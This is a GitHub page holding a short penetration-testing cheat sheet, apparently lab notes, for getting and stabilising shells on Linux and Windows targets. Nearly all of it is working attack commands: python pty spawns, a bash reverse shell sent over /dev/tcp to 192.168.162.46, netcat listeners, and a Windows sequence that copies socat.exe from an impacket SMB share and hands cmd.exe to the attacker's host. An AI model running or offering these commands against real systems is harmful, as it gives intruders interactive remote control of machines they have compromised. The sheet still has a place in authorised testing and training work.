-
Notifications
You must be signed in to change notification settings - Fork 0
/
mxpytty
37 lines (31 loc) · 915 Bytes
/
mxpytty
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
==================================
Linux
which python python2 python3
python -c 'import pty;pty.spawn("/bin/sh")'
python3 -c 'import pty;pty.spawn("/bin/sh")'
<CTL-Z>
stty raw -echo; fg
<enter><enter>
bash
stty cols 120 rows 35
export TERM=xterm-256color
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp
alias ll='ls -lah --color=auto'
alias lt='ls -lsahtr --color=auto'
reset
Last Resort
bash -c "bash -i >& /dev/tcp/192.168.162.46/8002 0>&1"
nc -nvlp 8002
==================================
Windows
rlwrap nc -nvlp 443 ..then upgrade to socat
doskey ll=dir /a $*
Kali
locate socat.exe
cd ~\tools\privesc_windows
python3 /usr/share/doc/python3-impacket/examples/smbserver.py share `pwd` -smb2support
socat TCP4-LISTEN:443,fork STDOUT
Windows:
cd C:\Windows\Temp
copy \\192.168.162.46\share\socat.exe
socat.exe TCP4:192.168.162.46:443 EXEC:'cmd.exe',pipes